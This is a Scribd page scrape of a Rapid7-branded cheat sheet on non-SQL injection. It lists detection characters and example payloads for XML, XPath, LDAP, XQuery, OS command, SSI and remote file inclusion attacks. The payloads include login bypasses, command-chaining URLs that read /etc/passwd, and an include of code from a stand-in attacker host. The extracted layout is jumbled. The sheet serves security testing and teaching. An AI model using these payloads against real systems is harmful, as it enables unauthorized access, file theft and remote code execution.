Scribd
Upload
72 views

Injection Non-SQL Cheat Sheet

This document provides a cheat sheet on various injection techniques such as SQL, XML, LDAP, and OS Command Injection with information on detection and exploitation methods. Detection methods are listed for each type of injection including common characters and syntax to look for. Exploitation examples are also given demonstrating how to perform actions like bypassing logins, adding unauthorized users, and executing remote commands or accessing files.

Uploaded by

descarao
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
72 views

Injection Non-SQL Cheat Sheet

This document provides a cheat sheet on various injection techniques such as SQL, XML, LDAP, and OS Command Injection with information on detection and exploitation methods. Detection methods are listed for each type of injection including common characters and syntax to look for. Exploitation examples are also given demonstrating how to perform actions like bypassing logins, adding unauthorized users, and executing remote commands or accessing files.

Uploaded by

descarao
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

INJECTION CHEAT SHEET (non-SQL)

XML Injection
Detection

single quote

double quote

XPATH Injection

<>

angular parentheses

Detection

<!--/-->

XML Comment tag

single quote

&

ampersand

double quote

<![CDATA[ / ]]>

CDATA section delimiters

www.rapid7.com

Exploitation

Exploitation

or 1=1 or =

<!-- EXISTING TAG -->

New value of existing tag along with tag name

] | * | user[@role=admin

Add user as administrator

NODENAME

returns all children of node

//NODENAME

returns all elements in the document

http://www.example.com/addUser.php?us
ername=dan&password=123456<!--email:
--><userid>0</userid><mail>[email protected]

NODENAME//SUBNODENAME

returns all SUBNODE under NODE element

OS Command Injection

//NODENAME/[NAME=VALUE]

returns all NODE that have a NAME child


equal to VALUE

Detection

http://site.com/login.
aspx?username=foo or 1=1 or =

Login bypass

LDAP Injection

| <ANOTHER COMMAND>

Pipe - On *NIX Output of first command to another,


In Windows multiple commands execution

; <ANOTHER COMMAND>

semicolon - Running two commands together

Exploitation

Detection

%<ENV VARIABLE>%

Windows only

opening bracket

&

Running command in background (*NIX Only)

closing bracket

Displays content of /etc/passwd file

Pipe - OR operator for LDAP

://site.com/whois.php?domain=foobar;
echo+/etc/passwd

&

Ampersand - AND operator for LDAP

XQuery Injection

Exclamation - NOT operator for LDAP

Detection

Exploitation

single quote

(&(param1=val1)(param2=val2))

AND operator

double quote

(|(param1=val1)(param2=val2))

OR operator

Exploitation

*)(ObjectClass=*))
(&(objectClass=void

Blind LDAP Injection using AND operator

or <ATTACK> or .=

void)(ObjectClass=void))(&(objectClass=void

BLIND LDAP Injection using OR operator

http://site.com/ldapsearch?user=*

Displays list of all users with attributes

something or =

Remote Code Injection

Displays list of all users with attributes

SSI Injection
Detection

Upload File
Upload file
PHP, JSP, ASP etc.

Injecting active content

execution!

Access back from webroot

Remote file inclusion/injection


include($incfile);

http://site.com/xmlsearch?user=foo or =

Look for word

.SHTML

File extension

Exploitation
< ! # = / . - > and [a-zA-Z0-9]

Required characters for successful execution

<!--#include virtual=<SOME SYSTEM FILE > -->

PHP call

http://site.com/page.php?file=http://www.attacker.com/exploit

include, echo, exec

Injecting

http://site.com/ssiform.php?showfile=<!-#include virtual=/etc/passwd -->

Displays content of /etc/passwd file

You might also like